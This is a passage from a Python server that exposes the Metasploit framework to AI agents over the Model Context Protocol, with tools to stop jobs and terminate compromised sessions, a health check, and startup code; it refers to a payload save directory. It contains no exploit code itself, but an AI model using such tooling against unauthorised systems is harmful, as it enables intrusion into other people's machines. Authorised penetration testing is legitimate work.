1539 | return {"status": "error", "message": f"Job {job_id} not found."}
1540 | if isinstance(jobs_before.get(job_id_str), dict):
1541 | job_name = jobs_before[job_id_str].get('name', 'Unknown Job')
1542 |
1543 | # Attempt to stop the job
1544 | logger.debug(f"Calling jobs.stop({job_id_str})")
1545 | stop_result_str = await asyncio.to_thread(lambda: client.jobs.stop(job_id_str))
1546 | logger.debug(f"jobs.stop() API call returned: {stop_result_str}")
1547 |
1548 | # Verify job stopped by checking list again
1549 | await asyncio.sleep(1.0) # Give MSF time to process stop
1550 | jobs_after = await asyncio.to_thread(lambda: client.jobs.list)
1551 | job_stopped = job_id_str not in jobs_after
1552 |
1553 | if job_stopped:
1554 | logger.info(f"Successfully stopped job {job_id} ('{job_name}') - verified by disappearance")
1555 | return {
1556 | "status": "success",
1557 | "message": f"Successfully stopped job {job_id} ('{job_name}')",
1558 | "job_id": job_id,
1559 | "job_name": job_name,
1560 | "api_result": stop_result_str
1561 | }
1562 | else:
1563 | # Job didn't disappear. The API result string might give a hint, but is unreliable.
1564 | logger.error(f"Failed to stop job {job_id}. Job still present after stop attempt. API result: '{stop_result_str}'")
1565 | return {
1566 | "status": "error",
1567 | "message": f"Failed to stop job {job_id}. Job may still be running. API result: '{stop_result_str}'",
1568 | "job_id": job_id,
1569 | "job_name": job_name,
1570 | "api_result": stop_result_str
1571 | }
1572 |
1573 | except MsfRpcError as e:
1574 | logger.error(f"MsfRpcError stopping job {job_id}: {e}")
1575 | return {"status": "error", "message": f"Error stopping job {job_id}: {e}"}
1576 | except Exception as e:
1577 | logger.exception(f"Unexpected error stopping job {job_id}.")
1578 | return {"status": "error", "message": f"Unexpected server error stopping job {job_id}: {e}"}
1579 |
1580 | @mcp.tool()
1581 | async def terminate_session(session_id: int) -> Dict[str, Any]:
1582 | """
1583 | Forcefully terminate a Metasploit session using the session.stop() method.
1584 |
1585 | Args:
1586 | session_id: ID of the session to terminate.
1587 |
1588 | Returns:
1589 | Dictionary with status and result message.
1590 | """
1591 | client = get_msf_client()
1592 | session_id_str = str(session_id)
1593 | logger.info(f"Terminating session {session_id}")
1594 |
1595 | try:
1596 | # Check if session exists
1597 | current_sessions = await asyncio.to_thread(lambda: client.sessions.list)
1598 | if session_id_str not in current_sessions:
1599 | logger.error(f"Session {session_id} not found.")
1600 | return {"status": "error", "message": f"Session {session_id} not found."}
1601 |
1602 | # Get a handle to the session
1603 | session = await asyncio.to_thread(lambda: client.sessions.session(session_id_str))
1604 |
1605 | # Stop the session
1606 | await asyncio.to_thread(lambda: session.stop())
1607 |
1608 | # Verify termination
1609 | await asyncio.sleep(1.0) # Give MSF time to process termination
1610 | current_sessions_after = await asyncio.to_thread(lambda: client.sessions.list)
1611 |
1612 | if session_id_str not in current_sessions_after:
1613 | logger.info(f"Successfully terminated session {session_id}")
1614 | return {"status": "success", "message": f"Session {session_id} terminated successfully."}
1615 | else:
1616 | logger.warning(f"Session {session_id} still appears in the sessions list after termination attempt.")
1617 | return {"status": "warning", "message": f"Session {session_id} may not have been terminated properly."}
1618 |
1619 | except MsfRpcError as e:
1620 | logger.error(f"MsfRpcError terminating session {session_id}: {e}")
1621 | return {"status": "error", "message": f"Error terminating session {session_id}: {e}"}
1622 | except Exception as e:
1623 | logger.exception(f"Unexpected error terminating session {session_id}")
1624 | return {"status": "error", "message": f"Unexpected error terminating session {session_id}: {e}"}
1625 |
1626 | # --- FastAPI Application Setup ---
1627 |
1628 | app = FastAPI(
1629 | title="Metasploit MCP Server (Streamlined)",
1630 | description="Provides core Metasploit functionality via the Model Context Protocol.",
1631 | version="1.6.0", # Incremented version
1632 | )
1633 |
1634 | # Setup MCP transport (SSE for HTTP mode)
1635 | sse = SseServerTransport("/messages/")
1636 |
1637 | # Define ASGI handlers properly with Starlette's ASGIApp interface
1638 | class SseEndpoint:
1639 | async def __call__(self, scope, receive, send):
1640 | """Handle Server-Sent Events connection for MCP communication."""
1641 | client_host = scope.get('client')[0] if scope.get('client') else 'unknown'
1642 | client_port = scope.get('client')[1] if scope.get('client') else 'unknown'
1643 | logger.info(f"New SSE connection from {client_host}:{client_port}")
1644 | async with sse.connect_sse(scope, receive, send) as (read_stream, write_stream):
1645 | await mcp._mcp_server.run(read_stream, write_stream, mcp._mcp_server.create_initialization_options())
1646 | logger.info(f"SSE connection closed from {client_host}:{client_port}")
1647 |
1648 | class MessagesEndpoint:
1649 | async def __call__(self, scope, receive, send):
1650 | """Handle client POST messages for MCP communication."""
1651 | client_host = scope.get('client')[0] if scope.get('client') else 'unknown'
1652 | client_port = scope.get('client')[1] if scope.get('client') else 'unknown'
1653 | logger.info(f"Received POST message from {client_host}:{client_port}")
1654 | await sse.handle_post_message(scope, receive, send)
1655 |
1656 | # Create routes using the ASGIApp-compliant classes
1657 | mcp_router = Router([
1658 | Route("/sse", endpoint=SseEndpoint(), methods=["GET"]),
1659 | Route("/messages/", endpoint=MessagesEndpoint(), methods=["POST"]),
1660 | ])
1661 |
1662 | # Mount the MCP router to the main app
1663 | app.routes.append(Mount("/", app=mcp_router))
1664 |
1665 | @app.get("/healthz", tags=["Health"])
1666 | async def health_check():
1667 | """Check connectivity to the Metasploit RPC service."""
1668 | try:
1669 | client = get_msf_client() # Will raise ConnectionError if not init
1670 | logger.debug(f"Executing health check MSF call (core.version) with {RPC_CALL_TIMEOUT}s timeout...")
1671 | # Use a lightweight call like core.version
1672 | version_info = await asyncio.wait_for(
1673 | asyncio.to_thread(lambda: client.core.version),
1674 | timeout=RPC_CALL_TIMEOUT
1675 | )
1676 | msf_version = version_info.get('version', 'N/A') if isinstance(version_info, dict) else 'N/A'
1677 | logger.info(f"Health check successful. MSF Version: {msf_version}")
1678 | return {"status": "ok", "msf_version": msf_version}
1679 | except asyncio.TimeoutError:
1680 | error_msg = f"Health check timeout ({RPC_CALL_TIMEOUT}s) - Metasploit server is not responding"
1681 | logger.error(error_msg)
1682 | raise HTTPException(status_code=503, detail=error_msg)
1683 | except (MsfRpcError, ConnectionError) as e:
1684 | logger.error(f"Health check failed - MSF RPC connection error: {e}")
1685 | raise HTTPException(status_code=503, detail=f"Metasploit Service Unavailable: {e}")
1686 | except Exception as e:
1687 | logger.exception("Unexpected error during health check.")
1688 | raise HTTPException(status_code=500, detail=f"Internal Server Error during health check: {e}")
1689 |
1690 | # --- Server Startup Logic ---
1691 |
1692 | def find_available_port(start_port, host='127.0.0.1', max_attempts=10):
1693 | """Finds an available TCP port."""
1694 | for port in range(start_port, start_port + max_attempts):
1695 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
1696 | try:
1697 | s.bind((host, port))
1698 | logger.debug(f"Port {port} on {host} is available.")
1699 | return port
1700 | except socket.error:
1701 | logger.debug(f"Port {port} on {host} is in use, trying next.")
1702 | continue
1703 | logger.warning(f"Could not find available port in range {start_port}-{start_port+max_attempts-1} on {host}. Using default {start_port}.")
1704 | return start_port
1705 |
1706 | if __name__ == "__main__":
1707 | # Initialize MSF Client - Critical for server function
1708 | try:
1709 | initialize_msf_client()
1710 | except (ValueError, ConnectionError, RuntimeError) as e:
1711 | logger.critical(f"CRITICAL: Failed to initialize Metasploit client on startup: {e}. Server cannot function.")
1712 | sys.exit(1) # Exit if MSF connection fails at start
1713 |
1714 | # --- Setup argument parser for transport mode and server configuration ---
1715 | import argparse
1716 |
1717 | parser = argparse.ArgumentParser(description='Run Streamlined Metasploit MCP Server')
1718 | parser.add_argument(
1719 | '--transport',
1720 | choices=['http', 'stdio'],
1721 | default='http',
1722 | help='MCP transport mode to use (http=SSE, stdio=direct pipe)'
1723 | )
1724 | parser.add_argument('--host', default='127.0.0.1', help='Host to bind the HTTP server to (default: 127.0.0.1)')
1725 | parser.add_argument('--port', type=int, default=None, help='Port to listen on (default: find available from 8085)')
1726 | parser.add_argument('--reload', action='store_true', help='Enable auto-reload (for development)')
1727 | parser.add_argument('--find-port', action='store_true', help='Force finding an available port starting from --port or 8085')
1728 | args = parser.parse_args()
1729 |
1730 | if args.transport == 'stdio':
1731 | logger.info("Starting MCP server in STDIO transport mode.")
1732 | try:
1733 | mcp.run(transport="stdio")
1734 | except Exception as e:
1735 | logger.exception("Error during MCP stdio run loop.")
1736 | sys.exit(1)
1737 | logger.info("MCP stdio server finished.")
1738 | else: # HTTP/SSE mode (default)
1739 | logger.info("Starting MCP server in HTTP/SSE transport mode.")
1740 |
1741 | # Check port availability
1742 | check_host = args.host if args.host != '0.0.0.0' else '127.0.0.1'
1743 | selected_port = args.port
1744 | if selected_port is None or args.find_port:
1745 | start_port = selected_port if selected_port is not None else 8085
1746 | selected_port = find_available_port(start_port, host=check_host)
1747 |
1748 | logger.info(f"Starting Uvicorn HTTP server on http://{args.host}:{selected_port}")
1749 | logger.info(f"MCP SSE Endpoint: /sse")
1750 | logger.info(f"API Docs available at http://{args.host}:{selected_port}/docs")
1751 | logger.info(f"Payload Save Directory: {PAYLOAD_SAVE_DIR}")
1752 | logger.info(f"Auto-reload: {'Enabled' if args.reload else 'Disabled'}")
1753 |
1754 | uvicorn.run(
1755 | "__main__:app",
1756 | host=args.host,
1757 | port=selected_port,
1758 | reload=args.reload,
1759 | log_level="info"
1760 | )
1761 |
```